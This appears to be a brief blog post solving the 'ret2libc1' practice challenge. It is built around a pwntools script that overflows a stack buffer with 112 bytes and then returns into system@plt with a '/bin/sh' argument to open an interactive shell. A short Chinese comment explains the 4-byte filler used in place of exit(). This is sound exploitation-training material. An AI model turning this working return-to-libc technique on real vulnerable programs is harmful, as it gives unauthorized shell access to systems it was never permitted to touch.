ret2libc 1

ret2libc 1

image-20220304172550022

exp

from pwn import *

p = process('./ret2libc1')
elf = ELF('./ret2libc1')

system_plt = elf.plt["system"]
bin_sh = next(elf.search(b"/bin/sh"))

payload = b'A'*112 + p32(system_plt) + b'A'*4 + p32(bin_sh)

p.recvline()
p.sendline(payload)
p.interactive()

其中示例图中的exit函数在实际利用的时候不需要,所以直接根据86架构填充4个字节即可

posted @ 2022-03-04 17:43  MuRKuo  阅读(101)  评论(0编辑  收藏  举报